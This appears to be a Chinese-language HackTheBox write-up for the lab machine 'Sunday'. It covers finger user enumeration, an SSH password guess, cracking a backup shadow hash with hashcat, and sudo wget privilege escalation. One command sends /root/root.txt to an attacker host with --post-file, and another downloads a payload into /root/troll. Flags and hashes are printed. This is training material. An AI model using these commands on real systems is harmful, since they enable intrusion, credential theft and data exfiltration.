Hackthebox - Sunday
靶场信息
靶场类型
信息收集
Nmap
┌──(root💀lucifiel)-[/home/lucifiel]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-14 12:51 CST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.76
Host is up (0.14s latency).
Not shown: 59990 filtered ports, 5540 closed ports
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer?
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.91%I=7%D=4/14%Time=6257A8F1%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/14%OT=79%CT=5%CU=31867%PV=Y%DS=2%DC=T%G=Y%TM=6257AA5
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=ST11M505NW2%O2=ST11M505NW2%O3=NNT11M505NW2%O4=ST11M505NW2%O5=ST
OS:11M505NW2%O6=ST11M505)WIN(W1=FB1E%W2=FB1E%W3=FA38%W4=FA3B%W5=FA3B%W6=FFF
OS:7)ECN(R=Y%DF=Y%T=3C%W=FAFA%O=M505NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=S+%F=AS%O=ST11M505NW
OS:2%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=N)U1(R=Y%DF=N%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=Y%T=FF%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 142.34 ms 10.10.14.1
2 142.67 ms 10.10.10.76
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 498.43 seconds
79 端口有一个 finger?,最后一个字母是啥就不知道了去搜搜看有没有漏洞
Searchsploit
┌──(root💀kali)-[~/Desktop]
└─# searchsploit finger
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
BSD 4.2 - 'fingerd' Remote Buffer Overflow | bsd/remote/19039.txt
cfingerd 1.4 - Format String (1) | linux/remote/20748.pl
cfingerd 1.4 - Format String (2) | linux/remote/20749.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (1) | unix/local/20962.pl
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (2) | unix/local/20963.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (3) | unix/local/20964.c
Daniel Beckham The Finger Server 0.82 Beta - Pipe | cgi/remote/19745.txt
FingerTec Fingerprint Reader - Remote Access and Remote Enrolment | hardware/remote/39227.txt
GNU Ffingerd 1.19 - 'Username' Validity Disclosure | unix/remote/20327.txt
Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure | multiple/remote/39292.pl
Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow | freebsd/local/19504.c
Morris Worm - fingerd Stack Buffer Overflow (Metasploit) | bsd/remote/45791.rb
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation | linux/local/22806.sh
Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software | windows/local/48815.txt
zkfingerd 0.9.1 - 'say()' Format String | linux/remote/22101.c
zkfingerd SysLog 0.9.1 - Format String | linux/remote/22091.c
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Paper Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Address Relay Fingerprinting (How to Use Often Discarded Bugs) | english/13193-address-relay-fing
Automated Web Application Fingerprinting | docs/english/17538-automated-web
Bitter Harvest: Systematically Fingerprinting Low- and Medium-interaction Honeypots at Internet Scale | docs/english/45365-bitter-harves
[Portuguese] Web Apps Fingerprinting | portuguese/13683-[portuguese]-we
[Spanish] El fingerprinting dentro de la seguridad web | docs/spanish/18421-[spanish]-el-
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
搜出来的结果不少,首先排除掉 cfingerd 以及其他的干扰,就剩下了一个 Morris Worm - fingerd Stack Buffer Overflow (Metasploit)
去尝试一下
Metasploit
msf6 > search fingerd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/bsd/finger/morris_fingerd_bof
msf6 > use 0
[*] Using configured payload bsd/vax/shell_reverse_tcp
去设置一下配置
msf6 exploit(bsd/finger/morris_fingerd_bof) > show options
Module options (exploit/bsd/finger/morris_fingerd_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.76 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 79 yes The target port (TCP)
Payload options (bsd/vax/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
然后去执行
msf6 exploit(bsd/finger/morris_fingerd_bof) > exploit
[-] 10.10.10.76:79 - Exploit failed: bsd/vax/shell_reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
这边是失败了,我们去看看有没有其他脚本
msf6 exploit(bsd/finger/morris_fingerd_bof) > search finger
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
1 auxiliary/scanner/finger/finger_users normal No Finger Service User Enumerator
2 auxiliary/server/browser_autopwn normal No HTTP Client Automatic Exploiter
3 exploit/bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow
4 auxiliary/gather/mybb_db_fingerprint 2014-02-13 normal Yes MyBB Database Fingerprint
5 exploit/windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow
6 auxiliary/scanner/oracle/isqlplus_login normal No Oracle iSQL*Plus Login Utility
7 auxiliary/scanner/oracle/isqlplus_sidbrute normal No Oracle iSQLPlus SID Check
8 post/windows/gather/enum_putty_saved_sessions normal No PuTTY Saved Sessions Enumeration Module
9 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
10 auxiliary/scanner/vmware/esx_fingerprint normal No VMWare ESX/ESXi Fingerprint Scanner
Interact with a module by name or index. For example info 10, use 10 or use auxiliary/scanner/vmware/esx_fingerprint
这里有一个扫描用户名的 auxiliary/scanner/finger/finger_users,去尝试一下
msf6 auxiliary(scanner/finger/finger_users) > show options
Module options (auxiliary/scanner/finger/finger_users):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.76 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 79 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERS_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of default UNIX accounts.
msf6 auxiliary(scanner/finger/finger_users) > exploit
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: ikeuser
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: netadm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: netcfg
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dhcpserv
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: daemon
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: ftp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: noaccess
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nobody
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nobody4
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: root
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sshd
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sys
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: aiuser
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: openldap
[+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, aiuser, bin, daemon, dhcpserv, dladm, ftp, ikeuser, lp, netadm, netcfg, noaccess, nobody, nobody4, openldap, root, sshd, sys
[*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
漏洞利用
这个似乎不好用,我去找到了一个脚本
然后再执行试试
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Apr 14 01:51:49 2022 #########
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm>
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.10.10.76: ikeuser IKE Admin < . . . . >..
jo ann@10.10.10.76: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.10.10.76: root Super-User console <Dec 19 10:30>..
sammy@10.10.10.76: sammy ??? console <Dec 19 08:35>..
sunny@10.10.10.76: sunny ??? console <Dec 19 09:56>..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Thu Apr 14 02:29:46 2022 #########
15 results.
10177 queries in 2277 seconds (4.5 queries / sec)
这里有三个用户不一样,都有登录信息。分别是 root、sammy、sunny
根据靶机图像和名字判断,账户应该是 sunny,密码可能是 sunday
┌──(root💀lucifiel)-[/home/lucifiel/Desktop]
└─# ssh -p 22022 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
ED25519 key fingerprint is SHA256:t3OPHhtGi4xT7FTt3pgi5hSIsfljwBsZAUOPVy8QyXc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (ED25519) to the list of known hosts.
Password:
Warning: 4 failed authentication attempts since last successful authentication. The latest at Thu Apr 14 06:59 2022.
Last login: Sun Dec 19 09:56:51 2021 on console
Oracle Corporation SunOS 5.11 11.4 Aug 2018
sunny@sunday:~$ whoami&&id
sunny
uid=101(sunny) gid=10(staff)
成功进入 user 权限
sunny@sunday:/home/sammy$ cat user.txt
a3d9498027ca5187ba1793943ee8a598
成功拿到 user 权限的 flag 文件
权限提升
sunny@sunday:/home/sammy$ sudo -l
用户 sunny 可以在 sunday 上运行以下命令:
(root) NOPASSWD: /root/troll
使用 sudo -l 查看了一下权限,发现可以使用 root 权限运行 /root/troll
运行一下看看
sunny@sunday:/home/sammy$ sudo /root/troll
sudo: /root/troll:找不到命令
提示找不到?那找找其他路子
sunny@sunday:/backup$ ls
agent22.backup shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
在目录 /backup 中找到了一个 shadow.backup 的文件,拿到了一串hash,去尝试爆破一下
echo $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB > hash
然后开始爆破
┌──(root💀kali)-[~/Desktop]
└─# hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 2878/2942 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Thu Apr 14 21:29:17 2022 (2 mins, 59 secs)
Time.Estimated...: Thu Apr 14 21:32:16 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1145 H/s (13.57ms) @ Accel:128 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 203776/14344385 (1.42%)
Rejected.........: 0/203776 (0.00%)
Restore.Point....: 203264/14344385 (1.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: dadof3 -> chs2009
Started: Thu Apr 14 21:28:48 2022
Stopped: Thu Apr 14 21:32:17 2022
得到了密码
username = sammy
password = cooldude!
去登录一下
sunny@sunday:~$ su sammy
Password:
sammy@sunday:~$ whoami&&id
sammy
uid=100(sammy) gid=10(staff)
sammy@sunday:~$ sudo -l
用户 sammy 可以在 sunday 上运行以下命令:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wget
使用 sudo -l 查看一下权限,发现可以使用 root 权限运行 wget,那就好办了 有方案了
然后使用 wget 的 –post-file 拿我们要的文件
sudo wget --post-file=/root/root.txt 10.10.14.2
sudo wget http://10.10.14.7/payload.sh -o /root/troll
然后回到 sunny 用户,使用 sudo /root/troll 执行
sudo /root/troll
使用 nc 监听一个端口后,再执行这条命令
nc -nvlp 80
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.76] 59151
POST / HTTP/1.1
User-Agent: Wget/1.19.5 (solaris2.11)
Accept: */*
Accept-Encoding: identity
Host: 10.10.14.2
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40fab61d99d37536daeec0d97af9b8
成功获得 root 权限的 flag 文件
